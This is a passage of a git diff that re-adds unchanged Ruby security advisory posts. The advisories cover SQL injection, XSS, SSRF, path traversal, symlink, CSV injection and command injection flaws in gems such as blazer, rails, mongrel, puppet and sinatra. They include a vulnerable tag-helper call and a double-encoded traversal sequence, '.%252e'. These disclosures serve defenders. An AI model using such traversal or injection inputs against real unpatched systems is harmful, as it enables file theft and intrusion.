+    - https://github.com/ruby-git/ruby-git/releases/tag/v1.11.0
+---
diff --git a/advisories/_posts/2022-04-20-CVE-2022-29498.md b/advisories/_posts/2022-04-20-CVE-2022-29498.md
index c891064e..5fa7aa4a 100644
--- a/advisories/_posts/2022-04-20-CVE-2022-29498.md
+++ b/advisories/_posts/2022-04-20-CVE-2022-29498.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2022-29498 (blazer): SQL injection for certain queries with variables'
-comments: false
-categories:
-- blazer
-advisory:
-  gem: blazer
-  cve: 2022-29498
-  ghsa: qf9q-q4hh-qph3
-  url: https://github.com/ankane/blazer/issues/392
-  title: SQL injection for certain queries with variables
-  date: 2022-04-20
-  description: |
-    For some queries, specific variable values can modify the query
-    rather than just the variable. This can occur if:
-
-    1. the query's data source uses different escaping than the Rails database OR
-    2. the query has a variable inside a string literal
-
-    Since Blazer is designed to run arbitrary queries, the impact will typically be low.
-    Users cannot run any queries they could not have already run. However, an attacker
-    could get a user to run a query they would not have normally run. If the data source
-    has write permissions, this could include modifying data in some cases.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.6.0"
----
+---
+layout: advisory
+title: 'CVE-2022-29498 (blazer): SQL injection for certain queries with variables'
+comments: false
+categories:
+- blazer
+advisory:
+  gem: blazer
+  cve: 2022-29498
+  ghsa: qf9q-q4hh-qph3
+  url: https://github.com/ankane/blazer/issues/392
+  title: SQL injection for certain queries with variables
+  date: 2022-04-20
+  description: |
+    For some queries, specific variable values can modify the query
+    rather than just the variable. This can occur if:
+
+    1. the query's data source uses different escaping than the Rails database OR
+    2. the query has a variable inside a string literal
+
+    Since Blazer is designed to run arbitrary queries, the impact will typically be low.
+    Users cannot run any queries they could not have already run. However, an attacker
+    could get a user to run a query they would not have normally run. If the data source
+    has write permissions, this could include modifying data in some cases.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.6.0"
+---
diff --git a/advisories/_posts/2022-04-22-CVE-2011-1497.md b/advisories/_posts/2022-04-22-CVE-2011-1497.md
index 02265412..501be2bb 100644
--- a/advisories/_posts/2022-04-22-CVE-2011-1497.md
+++ b/advisories/_posts/2022-04-22-CVE-2011-1497.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2011-1497 (actionpack): Cross site scripting in rails/actionpack < 3.0.6'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-1497
-  ghsa: q58j-fmvf-9rq6
-  url: https://github.com/rails/rails/blob/38df020c95beca7e12f0188cb7e18f3c37789e20/actionpack/CHANGELOG
-  title: Cross site scripting in rails/actionpack < 3.0.6
-  date: 2022-04-22
-  description: |
-    A cross-site scripting vulnerability flaw was found in
-    the auto_link function in Rails before version 3.0.6.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 3.0.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-1497
-    - https://github.com/rails/rails/blob/38df020c95beca7e12f0188cb7e18f3c37789e20/actionpack/CHANGELOG
-    - https://github.com/advisories/GHSA-q58j-fmvf-9rq6
-    - https://www.openwall.com/lists/oss-security/2011/04/06/13
----
+---
+layout: advisory
+title: 'CVE-2011-1497 (actionpack): Cross site scripting in rails/actionpack < 3.0.6'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-1497
+  ghsa: q58j-fmvf-9rq6
+  url: https://github.com/rails/rails/blob/38df020c95beca7e12f0188cb7e18f3c37789e20/actionpack/CHANGELOG
+  title: Cross site scripting in rails/actionpack < 3.0.6
+  date: 2022-04-22
+  description: |
+    A cross-site scripting vulnerability flaw was found in
+    the auto_link function in Rails before version 3.0.6.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 3.0.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-1497
+    - https://github.com/rails/rails/blob/38df020c95beca7e12f0188cb7e18f3c37789e20/actionpack/CHANGELOG
+    - https://github.com/advisories/GHSA-q58j-fmvf-9rq6
+    - https://www.openwall.com/lists/oss-security/2011/04/06/13
+---
diff --git a/advisories/_posts/2022-04-26-CVE-2022-27311.md b/advisories/_posts/2022-04-26-CVE-2022-27311.md
index 98965e33..3e3c2578 100644
--- a/advisories/_posts/2022-04-26-CVE-2022-27311.md
+++ b/advisories/_posts/2022-04-26-CVE-2022-27311.md
@@ -1,20 +1,20 @@
----
-layout: advisory
-title: 'CVE-2022-27311 (gibbon): Server side request forgery in gibbon'
-comments: false
-categories:
-- gibbon
-advisory:
-  gem: gibbon
-  cve: 2022-27311
-  ghsa: vx9g-377x-xwxq
-  url: https://github.com/amro/gibbon/pull/321
-  title: Server side request forgery in gibbon
-  date: 2022-04-26
-  description: |
-    Gibbon v3.4.3 and below allows attackers to execute a Server-Side Request
-    Forgery (SSRF) via a crafted URL. This issue has been resolved in version 3.4.4
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 3.4.4"
----
+---
+layout: advisory
+title: 'CVE-2022-27311 (gibbon): Server side request forgery in gibbon'
+comments: false
+categories:
+- gibbon
+advisory:
+  gem: gibbon
+  cve: 2022-27311
+  ghsa: vx9g-377x-xwxq
+  url: https://github.com/amro/gibbon/pull/321
+  title: Server side request forgery in gibbon
+  date: 2022-04-26
+  description: |
+    Gibbon v3.4.3 and below allows attackers to execute a Server-Side Request
+    Forgery (SSRF) via a crafted URL. This issue has been resolved in version 3.4.4
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 3.4.4"
+---
diff --git a/advisories/_posts/2022-04-26-CVE-2022-27777.md b/advisories/_posts/2022-04-26-CVE-2022-27777.md
index 011b832c..f6134f08 100644
--- a/advisories/_posts/2022-04-26-CVE-2022-27777.md
+++ b/advisories/_posts/2022-04-26-CVE-2022-27777.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2022-27777 (actionview): Possible XSS Vulnerability in Action View tag
-  helpers'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2022-27777
-  ghsa: ch3h-j2vf-95pv
-  url: https://groups.google.com/g/ruby-security-ann/c/9wJPEDv-iRw
-  title: Possible XSS Vulnerability in Action View tag helpers
-  date: 2022-04-26
-  description: |
-    There is a possible XSS vulnerability in Action View tag helpers.  Passing
-    untrusted input as hash keys can lead to a possible XSS vulnerability. This
-    vulnerability has been assigned the CVE identifier CVE-2022-27777.
-
-    Versions Affected:  ALL
-    Not affected:       NONE
-    Fixed Versions:     7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
-
-    ## Impact
-
-    If untrusted data is passed as the hash key for tag attributes, there is a
-    possibility that the untrusted data may not be properly escaped which can
-    lead to an XSS vulnerability.
-
-    Impacted code will look something like this:
-
-    ```
-    check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' })
-    ```
-
-    Where the "malicious_input" variable contains untrusted data.
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    ## Releases
-
-    The FIXED releases are available at the normal locations.
-
-    ## Workarounds
-
-    Escape the untrusted data before using it as a key for tag helper methods.
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 5.2.7, >= 5.2.7.1"
-  - "~> 6.0.4, >= 6.0.4.8"
-  - "~> 6.1.5, >= 6.1.5.1"
-  - ">= 7.0.2.4"
-  related:
-    url:
-    - https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85
-    - https://github.com/rails/rails/blob/7-0-stable/actionview/CHANGELOG.md#rails-7024-april-26-2022
----
+---
+layout: advisory
+title: 'CVE-2022-27777 (actionview): Possible XSS Vulnerability in Action View tag
+  helpers'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2022-27777
+  ghsa: ch3h-j2vf-95pv
+  url: https://groups.google.com/g/ruby-security-ann/c/9wJPEDv-iRw
+  title: Possible XSS Vulnerability in Action View tag helpers
+  date: 2022-04-26
+  description: |
+    There is a possible XSS vulnerability in Action View tag helpers.  Passing
+    untrusted input as hash keys can lead to a possible XSS vulnerability. This
+    vulnerability has been assigned the CVE identifier CVE-2022-27777.
+
+    Versions Affected:  ALL
+    Not affected:       NONE
+    Fixed Versions:     7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
+
+    ## Impact
+
+    If untrusted data is passed as the hash key for tag attributes, there is a
+    possibility that the untrusted data may not be properly escaped which can
+    lead to an XSS vulnerability.
+
+    Impacted code will look something like this:
+
+    ```
+    check_box_tag('thename', 'thevalue', false, aria: { malicious_input => 'thevalueofaria' })
+    ```
+
+    Where the "malicious_input" variable contains untrusted data.
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    ## Releases
+
+    The FIXED releases are available at the normal locations.
+
+    ## Workarounds
+
+    Escape the untrusted data before using it as a key for tag helper methods.
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 5.2.7, >= 5.2.7.1"
+  - "~> 6.0.4, >= 6.0.4.8"
+  - "~> 6.1.5, >= 6.1.5.1"
+  - ">= 7.0.2.4"
+  related:
+    url:
+    - https://github.com/rails/rails/commit/649516ce0feb699ae06a8c5e81df75d460cc9a85
+    - https://github.com/rails/rails/blob/7-0-stable/actionview/CHANGELOG.md#rails-7024-april-26-2022
+---
diff --git a/advisories/_posts/2022-04-27-CVE-2022-22577.md b/advisories/_posts/2022-04-27-CVE-2022-22577.md
index f46bb032..8ba14ab6 100644
--- a/advisories/_posts/2022-04-27-CVE-2022-22577.md
+++ b/advisories/_posts/2022-04-27-CVE-2022-22577.md
@@ -1,49 +1,49 @@
----
-layout: advisory
-title: 'CVE-2022-22577 (actionpack): Possible XSS Vulnerability in Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2022-22577
-  ghsa: mm33-5vfq-3mm3
-  url: https://groups.google.com/g/ruby-security-ann/c/NuFRKaN5swI
-  title: Possible XSS Vulnerability in Action Pack
-  date: 2022-04-27
-  description: |
-    There is a possible XSS vulnerability in Rails / Action Pack. This vulnerability has been
-    assigned the CVE identifier CVE-2022-22577.
-
-    Versions Affected:  >= 5.2.0
-    Not affected:       < 5.2.0
-    Fixed Versions:     7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
-
-    ## Impact
-
-    CSP headers were only sent along with responses that Rails considered as
-    "HTML" responses.  This left API requests without CSP headers, which could
-    possibly expose users to XSS attacks.
-
-    ## Releases
-
-    The FIXED releases are available at the normal locations.
-
-    ## Workarounds
-
-    Set a CSP for your API responses manually.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 5.2.0"
-  patched_versions:
-  - "~> 5.2.7, >= 5.2.7.1"
-  - "~> 6.0.4, >= 6.0.4.8"
-  - "~> 6.1.5, >= 6.1.5.1"
-  - ">= 7.0.2.4"
-  related:
-    url:
-    - https://github.com/rails/rails/pull/44635
-    - https://github.com/rails/rails/blob/7-0-stable/actionpack/CHANGELOG.md#rails-7024-april-26-2022
----
+---
+layout: advisory
+title: 'CVE-2022-22577 (actionpack): Possible XSS Vulnerability in Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2022-22577
+  ghsa: mm33-5vfq-3mm3
+  url: https://groups.google.com/g/ruby-security-ann/c/NuFRKaN5swI
+  title: Possible XSS Vulnerability in Action Pack
+  date: 2022-04-27
+  description: |
+    There is a possible XSS vulnerability in Rails / Action Pack. This vulnerability has been
+    assigned the CVE identifier CVE-2022-22577.
+
+    Versions Affected:  >= 5.2.0
+    Not affected:       < 5.2.0
+    Fixed Versions:     7.0.2.4, 6.1.5.1, 6.0.4.8, 5.2.7.1
+
+    ## Impact
+
+    CSP headers were only sent along with responses that Rails considered as
+    "HTML" responses.  This left API requests without CSP headers, which could
+    possibly expose users to XSS attacks.
+
+    ## Releases
+
+    The FIXED releases are available at the normal locations.
+
+    ## Workarounds
+
+    Set a CSP for your API responses manually.
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 5.2.0"
+  patched_versions:
+  - "~> 5.2.7, >= 5.2.7.1"
+  - "~> 6.0.4, >= 6.0.4.8"
+  - "~> 6.1.5, >= 6.1.5.1"
+  - ">= 7.0.2.4"
+  related:
+    url:
+    - https://github.com/rails/rails/pull/44635
+    - https://github.com/rails/rails/blob/7-0-stable/actionpack/CHANGELOG.md#rails-7024-april-26-2022
+---
diff --git a/advisories/_posts/2022-05-01-CVE-2007-6612.md b/advisories/_posts/2022-05-01-CVE-2007-6612.md
index 01c47017..acd03cef 100644
--- a/advisories/_posts/2022-05-01-CVE-2007-6612.md
+++ b/advisories/_posts/2022-05-01-CVE-2007-6612.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2007-6612 (mongrel): Mongrel vulnerable to directory traversal via double-encoded
-  sequences'
-comments: false
-categories:
-- mongrel
-advisory:
-  gem: mongrel
-  cve: 2007-6612
-  ghsa: m7r6-43v2-49vf
-  url: https://nvd.nist.gov/vuln/detail/CVE-2007-6612
-  title: Mongrel vulnerable to directory traversal via double-encoded sequences
-  date: 2022-05-01
-  description: |
-    Directory traversal vulnerability in DirHandler (lib/mongrel/handlers.rb)
-    in Mongrel 1.0.4 (1.0.3 and prior are not affected) and 1.1.x before
-    1.1.3 allows remote attackers to read arbitrary files via an HTTP
-    request containing double-encoded sequences (`.%252e`).
-  cvss_v2: 6.4
-  unaffected_versions:
-  - "< 1.0.4"
-  patched_versions:
-  - "~> 1.0.5"
-  - ">= 1.1.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2007-6612
-    - https://lists.apple.com/archives/security-announce/2008//May/msg00001.html
-    - https://web.archive.org/web/20080111034049/http://rubyforge.org/pipermail/mongrel-users/2007-December/004743.html
-    - https://web.archive.org/web/20200301091534/http://www.securityfocus.com/bid/27133
-    - https://github.com/advisories/GHSA-m7r6-43v2-49vf
----
+---
+layout: advisory
+title: 'CVE-2007-6612 (mongrel): Mongrel vulnerable to directory traversal via double-encoded
+  sequences'
+comments: false
+categories:
+- mongrel
+advisory:
+  gem: mongrel
+  cve: 2007-6612
+  ghsa: m7r6-43v2-49vf
+  url: https://nvd.nist.gov/vuln/detail/CVE-2007-6612
+  title: Mongrel vulnerable to directory traversal via double-encoded sequences
+  date: 2022-05-01
+  description: |
+    Directory traversal vulnerability in DirHandler (lib/mongrel/handlers.rb)
+    in Mongrel 1.0.4 (1.0.3 and prior are not affected) and 1.1.x before
+    1.1.3 allows remote attackers to read arbitrary files via an HTTP
+    request containing double-encoded sequences (`.%252e`).
+  cvss_v2: 6.4
+  unaffected_versions:
+  - "< 1.0.4"
+  patched_versions:
+  - "~> 1.0.5"
+  - ">= 1.1.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-6612
+    - https://lists.apple.com/archives/security-announce/2008//May/msg00001.html
+    - https://web.archive.org/web/20080111034049/http://rubyforge.org/pipermail/mongrel-users/2007-December/004743.html
+    - https://web.archive.org/web/20200301091534/http://www.securityfocus.com/bid/27133
+    - https://github.com/advisories/GHSA-m7r6-43v2-49vf
+---
diff --git a/advisories/_posts/2022-05-02-CVE-2010-0156.md b/advisories/_posts/2022-05-02-CVE-2010-0156.md
index 6b86e122..e4f60bbb 100644
--- a/advisories/_posts/2022-05-02-CVE-2010-0156.md
+++ b/advisories/_posts/2022-05-02-CVE-2010-0156.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2010-0156 (puppet): Puppet arbitrary files overwrite via a symlink attack'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2010-0156
-  ghsa: vrh7-99jh-3fmm
-  url: https://puppet.com/security/cve/cve-2010-0156
-  title: Puppet arbitrary files overwrite via a symlink attack
-  date: 2022-05-02
-  description: |
-    Puppet 0.24.x before 0.24.9 and 0.25.x before 0.25.2 allows local
-    users to overwrite arbitrary files via a symlink attack on the
-    (1) /tmp/daemonout,
-    (2) /tmp/puppetdoc.txt,
-    (3) /tmp/puppetdoc.tex, or
-    (4) /tmp/puppetdoc.aux temporary file.
-  cvss_v2: 3.3
-  unaffected_versions:
-  - "< 0.24.0"
-  patched_versions:
-  - "~> 0.24.9"
-  - ">= 0.25.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2010-0156
-    - https://puppet.com/security/cve/cve-2010-0156
-    - https://github.com/puppetlabs/puppet/commit/0aae57f91dc69b22fb674f8de3a13c22edd07128
-    - https://github.com/puppetlabs/puppet/commit/6111ba80f2c6f6d1541af971f565119e6e03d77d
-    - https://bugzilla.redhat.com/show_bug.cgi?id=502881
-    - http://groups.google.com/group/puppet-announce/browse_thread/thread/4401823f6cbf6087
-    - http://groups.google.com/group/puppet-announce/browse_thread/thread/73cd1b2896d986c2
-    - http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036083.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036166.html
-    - http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html
-    - https://web.archive.org/web/20100316113904/http://secunia.com/advisories/38766
-    - https://github.com/advisories/GHSA-vrh7-99jh-3fmm
----
+---
+layout: advisory
+title: 'CVE-2010-0156 (puppet): Puppet arbitrary files overwrite via a symlink attack'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2010-0156
+  ghsa: vrh7-99jh-3fmm
+  url: https://puppet.com/security/cve/cve-2010-0156
+  title: Puppet arbitrary files overwrite via a symlink attack
+  date: 2022-05-02
+  description: |
+    Puppet 0.24.x before 0.24.9 and 0.25.x before 0.25.2 allows local
+    users to overwrite arbitrary files via a symlink attack on the
+    (1) /tmp/daemonout,
+    (2) /tmp/puppetdoc.txt,
+    (3) /tmp/puppetdoc.tex, or
+    (4) /tmp/puppetdoc.aux temporary file.
+  cvss_v2: 3.3
+  unaffected_versions:
+  - "< 0.24.0"
+  patched_versions:
+  - "~> 0.24.9"
+  - ">= 0.25.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2010-0156
+    - https://puppet.com/security/cve/cve-2010-0156
+    - https://github.com/puppetlabs/puppet/commit/0aae57f91dc69b22fb674f8de3a13c22edd07128
+    - https://github.com/puppetlabs/puppet/commit/6111ba80f2c6f6d1541af971f565119e6e03d77d
+    - https://bugzilla.redhat.com/show_bug.cgi?id=502881
+    - http://groups.google.com/group/puppet-announce/browse_thread/thread/4401823f6cbf6087
+    - http://groups.google.com/group/puppet-announce/browse_thread/thread/73cd1b2896d986c2
+    - http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036083.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2010-March/036166.html
+    - http://lists.opensuse.org/opensuse-security-announce/2010-06/msg00001.html
+    - https://web.archive.org/web/20100316113904/http://secunia.com/advisories/38766
+    - https://github.com/advisories/GHSA-vrh7-99jh-3fmm
+---
diff --git a/advisories/_posts/2022-05-03-CVE-2022-28481.md b/advisories/_posts/2022-05-03-CVE-2022-28481.md
index c86943d0..ba790ad2 100644
--- a/advisories/_posts/2022-05-03-CVE-2022-28481.md
+++ b/advisories/_posts/2022-05-03-CVE-2022-28481.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2022-28481 (csv-safe): CSV-Safe improperly filters special characters
-  potentially leading to CSV injection'
-comments: false
-categories:
-- csv-safe
-advisory:
-  gem: csv-safe
-  cve: 2022-28481
-  ghsa: f55g-x8qq-2569
-  url: https://github.com/zvory/csv-safe/issues/7
-  title: CSV-Safe improperly filters special characters potentially leading to CSV
-    injection
-  date: 2022-05-03
-  description: |
-    CSV-Safe gem < 3.0.0 doesn't filter out special characters which could
-    trigger CSV Injection.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 3.0.0"
-  related:
-    url:
-    - https://github.com/zvory/csv-safe/pull/8
-    - https://github.com/WeblateOrg/weblate/commit/d9e136ff228e3760fd6dd7572869ac38e9a81809
-    - https://hackerone.com/reports/223999
----
+---
+layout: advisory
+title: 'CVE-2022-28481 (csv-safe): CSV-Safe improperly filters special characters
+  potentially leading to CSV injection'
+comments: false
+categories:
+- csv-safe
+advisory:
+  gem: csv-safe
+  cve: 2022-28481
+  ghsa: f55g-x8qq-2569
+  url: https://github.com/zvory/csv-safe/issues/7
+  title: CSV-Safe improperly filters special characters potentially leading to CSV
+    injection
+  date: 2022-05-03
+  description: |
+    CSV-Safe gem < 3.0.0 doesn't filter out special characters which could
+    trigger CSV Injection.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 3.0.0"
+  related:
+    url:
+    - https://github.com/zvory/csv-safe/pull/8
+    - https://github.com/WeblateOrg/weblate/commit/d9e136ff228e3760fd6dd7572869ac38e9a81809
+    - https://hackerone.com/reports/223999
+---
diff --git a/advisories/_posts/2022-05-03-CVE-2022-29970.md b/advisories/_posts/2022-05-03-CVE-2022-29970.md
index ff7f23ee..2da895b4 100644
--- a/advisories/_posts/2022-05-03-CVE-2022-29970.md
+++ b/advisories/_posts/2022-05-03-CVE-2022-29970.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2022-29970 (sinatra): sinatra does not validate expanded path matches'
-comments: false
-categories:
-- sinatra
-advisory:
-  gem: sinatra
-  cve: 2022-29970
-  ghsa: qp49-3pvw-x4m5
-  url: https://github.com/sinatra/sinatra/pull/1683
-  title: sinatra does not validate expanded path matches
-  date: 2022-05-03
-  description: |
-    Sinatra before 2.2.0 does not validate that the expanded path matches
-    public_dir when serving static files.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.2.0"
----
+---
+layout: advisory
+title: 'CVE-2022-29970 (sinatra): sinatra does not validate expanded path matches'
+comments: false
+categories:
+- sinatra
+advisory:
+  gem: sinatra
+  cve: 2022-29970
+  ghsa: qp49-3pvw-x4m5
+  url: https://github.com/sinatra/sinatra/pull/1683
+  title: sinatra does not validate expanded path matches
+  date: 2022-05-03
+  description: |
+    Sinatra before 2.2.0 does not validate that the expanded path matches
+    public_dir when serving static files.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.2.0"
+---
diff --git a/advisories/_posts/2022-05-05-CVE-2013-2095.md b/advisories/_posts/2022-05-05-CVE-2013-2095.md
index 925c5eb1..ffb7808e 100644
--- a/advisories/_posts/2022-05-05-CVE-2013-2095.md
+++ b/advisories/_posts/2022-05-05-CVE-2013-2095.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2013-2095 (openshift-origin-controller): RubyGem openshift-origin-controller
-  is vulnerable to command injection'
-comments: false
-categories:
-- openshift-origin-controller
-advisory:
-  gem: openshift-origin-controller
-  cve: 2013-2095
-  ghsa: 77xq-7c6p-6xp6
-  url: https://access.redhat.com/security/cve/cve-2013-2095
-  title: RubyGem openshift-origin-controller is vulnerable to command injection
-  date: 2022-05-05
-  description: |
-    'rubygem-openshift-origin-controller: API can be used to create applications
-    via cartridge_cache.rb URI.prase() to perform command injection'
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  notes: |
-    - Never patched
-    - Last release is 1.3.4 (Jan.16,2013)
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2013-2095
-    - https://access.redhat.com/security/cve/cve-2013-2095
-    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2095
-    - https://github.com/advisories/GHSA-77xq-7c6p-6xp6
----
+---
+layout: advisory
+title: 'CVE-2013-2095 (openshift-origin-controller): RubyGem openshift-origin-controller
+  is vulnerable to command injection'
+comments: false
+categories:
+- openshift-origin-controller
+advisory:
+  gem: openshift-origin-controller
+  cve: 2013-2095
+  ghsa: 77xq-7c6p-6xp6
+  url: https://access.redhat.com/security/cve/cve-2013-2095
+  title: RubyGem openshift-origin-controller is vulnerable to command injection
+  date: 2022-05-05
+  description: |
+    'rubygem-openshift-origin-controller: API can be used to create applications
+    via cartridge_cache.rb URI.prase() to perform command injection'
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  notes: |
+    - Never patched
+    - Last release is 1.3.4 (Jan.16,2013)
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2013-2095
+    - https://access.redhat.com/security/cve/cve-2013-2095
+    - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-2095
+    - https://github.com/advisories/GHSA-77xq-7c6p-6xp6
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-1000026.md b/advisories/_posts/2022-05-13-CVE-2017-1000026.md
index 30cb6403..7c690b23 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-1000026.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-1000026.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2017-1000026 (mixlib-archive): mixlib-archive Path Traversal vulnerability'
-comments: false
-categories:
-- mixlib-archive
-advisory:
-  gem: mixlib-archive
-  cve: 2017-1000026
-  ghsa: 98wx-cw86-c97x
-  url: https://github.com/chef/mixlib-archive/blob/master/CHANGELOG.md
-  title: mixlib-archive Path Traversal vulnerability
-  date: 2022-05-13
-  description: |
-    Chef Software's mixlib-archive versions 0.3.0 and older are vulnerable
-    to a directory traversal attack allowing attackers to overwrite arbitrary files
-    by using `..` in tar archive entries
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.4.0"
-  related:
-    url:
-    - https://github.com/chef/mixlib-archive/pull/6
----
+---
+layout: advisory
+title: 'CVE-2017-1000026 (mixlib-archive): mixlib-archive Path Traversal vulnerability'
+comments: false
+categories:
+- mixlib-archive
+advisory:
+  gem: mixlib-archive
+  cve: 2017-1000026
+  ghsa: 98wx-cw86-c97x
+  url: https://github.com/chef/mixlib-archive/blob/master/CHANGELOG.md
+  title: mixlib-archive Path Traversal vulnerability
+  date: 2022-05-13
+  description: |
+    Chef Software's mixlib-archive versions 0.3.0 and older are vulnerable
+    to a directory traversal attack allowing attackers to overwrite arbitrary files
+    by using `..` in tar archive entries
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.4.0"
+  related:
+    url:
+    - https://github.com/chef/mixlib-archive/pull/6
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-10689.md b/advisories/_posts/2022-05-13-CVE-2017-10689.md
index 6d70bb0f..3fc866f5 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-10689.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-10689.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2017-10689 (puppet): Tarball permission preservation in puppet'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2017-10689
-  ghsa: vw22-465p-8j5w
-  url: https://puppet.com/security/cve/CVE-2017-10689
-  title: Tarball permission preservation in puppet
-  date: 2022-05-13
-  description: |
-    When installing a module using the system tar, the PMT will filter filesystem
-    permissions to a sane value. This may just be based on the user's umask.
-
-    When using minitar, files are unpacked with whatever permissions are in the
-    tarball. This is potentially unsafe, as tarballs can be easily created with
-    weird permissions.
-  cvss_v3: 5.5
-  patched_versions:
-  - "~> 4.10.10"
-  - ">= 5.3.4"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:2927
-    - https://usn.ubuntu.com/3567-1/
-    - https://github.com/puppetlabs/puppet/commit/17d9e02da3882e44c1876e2805cf9708481715ee
-    - https://github.com/puppetlabs/puppet/commit/2f1047f85e22cde139a421bc25d371f2ffc92cb1
-    - https://tickets.puppetlabs.com/browse/PUP-7866
----
+---
+layout: advisory
+title: 'CVE-2017-10689 (puppet): Tarball permission preservation in puppet'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2017-10689
+  ghsa: vw22-465p-8j5w
+  url: https://puppet.com/security/cve/CVE-2017-10689
+  title: Tarball permission preservation in puppet
+  date: 2022-05-13
+  description: |
+    When installing a module using the system tar, the PMT will filter filesystem
+    permissions to a sane value. This may just be based on the user's umask.
+
+    When using minitar, files are unpacked with whatever permissions are in the
+    tarball. This is potentially unsafe, as tarballs can be easily created with
+    weird permissions.
+  cvss_v3: 5.5
+  patched_versions:
+  - "~> 4.10.10"
+  - ">= 5.3.4"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:2927
+    - https://usn.ubuntu.com/3567-1/
+    - https://github.com/puppetlabs/puppet/commit/17d9e02da3882e44c1876e2805cf9708481715ee
+    - https://github.com/puppetlabs/puppet/commit/2f1047f85e22cde139a421bc25d371f2ffc92cb1
+    - https://tickets.puppetlabs.com/browse/PUP-7866
+---
diff --git a/advisories/_posts/2022-05-13-CVE-2017-10906.md b/advisories/_posts/2022-05-13-CVE-2017-10906.md
index dc54321e..fce02294 100644
--- a/advisories/_posts/2022-05-13-CVE-2017-10906.md
+++ b/advisories/_posts/2022-05-13-CVE-2017-10906.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2017-10906 (fluentd): Fluentd Escape Sequence Injection Vulnerability'
-comments: false
-categories:
-- fluentd
-advisory:
-  gem: fluentd
-  cve: 2017-10906
-  ghsa: 5jrp-w8fr-mrww
-  url: https://github.com/fluent/fluentd/pull/1733
-  title: Fluentd Escape Sequence Injection Vulnerability
-  date: 2022-05-13
-  description: |
-    Escape sequence injection vulnerability in Fluentd versions 0.12.29 through
-    0.12.40 may allow an attacker to change the terminal UI or execute arbitrary commands
-    on the device via unspecified vectors.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 0.12.29"
-  patched_versions:
-  - ">= 0.12.41"
-  related:
-    url:
